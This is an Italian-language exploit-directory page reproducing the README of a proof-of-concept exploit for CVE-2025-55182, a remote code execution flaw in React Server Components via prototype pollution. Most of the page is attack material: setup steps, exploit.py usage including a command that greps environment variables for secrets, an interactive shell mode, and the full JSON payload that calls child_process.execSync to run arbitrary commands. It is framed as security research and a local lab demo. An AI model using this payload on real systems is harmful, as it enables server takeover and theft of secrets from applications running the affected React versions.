Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
EXPLOIT-CVE-2025-55182 — Exploit proof-of-concept per CVE-2025-55182 (React2Shell), una vulnerabilità critica RCE nei React Server Components tramite prototype pollution. Include modalità di sfruttamento interattiva e da riga di comando. | Kitploit
Strumenti/GitHubGitHub/joaovicdev/exploit-cve-2025-55182
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed TeamingSviluppo Payload
GitHubjoaovicdev/exploit-cve-2025-55182

EXPLOIT-CVE-2025-55182

Exploit proof-of-concept per CVE-2025-55182 (React2Shell), una vulnerabilità critica RCE nei React Server Components tramite prototype pollution. Include modalità di sfruttamento interattiva e da riga di comando.

Vedi Repository
5 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 Prova di Concetto

CVE-2025-55182 React

Panoramica

Una dimostrazione pratica di CVE-2025-55182 (React2Shell) - una vulnerabilità critica RCE nei React Server Components.

Dettagli della Vulnerabilità

  • CVE ID: CVE-2025-55182
  • Tipo: Esecuzione di Codice Remota tramite Prototype Pollution
  • CVSS: 9.8 (CRITICO)
  • Affette: React 19.0.0, 19.1.0, 19.1.1, 19.2.0

Vettore d'Attacco

I React Server Components deserializzano i FormData in modo non sicuro. Campi multipart appositamente predisposti innescano la prototype pollution ed eseguono codice arbitrario tramite child_process.execSync.


Configurazione Rapida

root@kitploit:~
npm install
pip3 install requests
npm run dev

L'applicazione è in esecuzione su: http://localhost:3000


Sfruttamento

Utilizzo Base

root@kitploit:~
python3 exploit.py -c "whoami"

Esempi di Comandi

root@kitploit:~
python3 exploit.py -c "whoami"
python3 exploit.py -c "pwd"
python3 exploit.py -c "ls -la"
python3 exploit.py -c "cat package.json"
python3 exploit.py -c "env | grep SECRET"

Modalità Interattiva

root@kitploit:~
python3 exploit.py -i
root@kitploit:~
> whoami
COMMAND RESULT:
your-username
============================================================

> pwd
COMMAND RESULT:
/path/to/project
============================================================

> exit

Come Funziona

Struttura del Payload

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('CMD',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

Test

Terminale 1: Avvia il server

root@kitploit:~
npm run dev

Terminale 2: Esegui l'exploit

root@kitploit:~
python3 exploit.py -c "whoami"

Modalità Verbosa

root@kitploit:~
python3 exploit.py -c "whoami" -v

Mostra la struttura completa del payload e la risposta del server


Riferimenti

  • CVE-2025-55182 - NVD
  • React Security
  • OWASP Deserialization

Di Guaxinim | Ricerca sulla Sicurezza Informatica

Scarica lo strumento